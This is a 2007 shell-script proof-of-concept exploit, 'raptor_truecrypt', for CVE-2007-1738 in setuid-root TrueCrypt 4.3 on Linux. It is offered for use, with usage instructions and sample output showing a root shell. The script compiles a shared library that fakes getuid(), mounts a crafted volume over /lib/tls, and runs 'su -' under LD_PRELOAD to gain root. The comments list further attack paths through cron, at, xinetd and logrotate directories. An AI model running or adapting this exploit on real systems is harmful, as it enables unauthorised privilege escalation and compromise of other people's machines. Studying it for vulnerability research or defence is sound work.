#!/bin/sh

#
# $Id: raptor_truecrypt,v 1.1.1.1 2007/04/04 11:31:56 raptor Exp $
#
# raptor_truecrypt - setuid truecrypt privilege escalation
# Copyright (c) 2007 Marco Ivaldi <raptor@0xdeadbeef.info>
#
# TrueCrypt 4.3, when installed setuid root, allows local users to cause a 
# denial of service (filesystem unavailability) or gain privileges by mounting 
# a crafted TrueCrypt volume, as demonstrated using (1) /usr/bin or (2) another
# user's home directory, a different issue than CVE-2007-1589 (CVE-2007-1738).
#
# WARNING: THIS IS A PROOF OF CONCEPT EXPLOIT TAKING ADVANTAGE OF NPTL THREAD
# LOCAL STORAGE DYNAMIC LINKING MODEL, DO NOT USE IT IF YOU DON'T KNOW HOW IT
# WORKS! YEAH, IT *DOES* REQUIRE SOME TWEAKINGS TO EXPLOIT NON-TLS PLATFORMS!
#
# Other possible attack vectors: /etc/cron.{d,hourly,daily,weekly,monthly}, at 
# (/var/spool/atjobs/), xinetd (/etc/xinetd.d), /etc/logrotate.d, and more...
#
# Usage:
# $ tar xvfz raptor_truecrypt.tgz
# $ cd raptor_truecrypt
# $ chmod +x raptor_truecrypt
# $ ./raptor_truecrypt
# raptor_truecrypt - setuid truecrypt privilege escalation
# Copyright (c) 2007 Marco Ivaldi <raptor@0xdeadbeef.info>
# 
# Mounting the evil volume (press enter at password prompt)
# Enter password for '/home/guest/raptor_truecrypt/pwned.tc': 
# # id
# uid=0(root) gid=0(root) groups=0(root)
# # exit
# logout
# Unmounting the evil volume (don't forget to cleanup /tmp)
# $
#
# Vulnerable platforms:
# TrueCrypt <= 4.3 on GNU/Linux (installed in setuid mode)
#

echo "raptor_truecrypt - setuid truecrypt privilege escalation"
echo "Copyright (c) 2007 Marco Ivaldi <raptor@0xdeadbeef.info>"
echo

# prepare the evil shared library
echo "int getuid(){return 0;}" > /tmp/getuid.c
gcc -fPIC -Wall -g -O2 -shared -o /tmp/getuid.so /tmp/getuid.c
if [ $? -ne 0 ]; then
	echo "Error: problems compiling evil shared library, check your gcc"
	exit 1
fi

# for setuid binaries only libraries that are also setuid will be loaded
chmod +s /tmp/getuid.so

# mount the evil volume over /lib/tls;)
echo "Mounting the evil volume (press enter at password prompt)"
truecrypt --keyfile pwned.key pwned.tc /lib/tls
if [ $? -ne 0 ]; then
	echo "Error: /lib/tls does not exist or truecrypt is not vulnerable"
	exit 1
fi

# do the trick!
ln -s /tmp/getuid.so /lib/tls
LD_PRELOAD=getuid.so su -

# cleanup and bye
echo "Unmounting the evil volume (don't forget to cleanup /tmp)"
rm -f /lib/tls/getuid.so
truecrypt -d /lib/tls
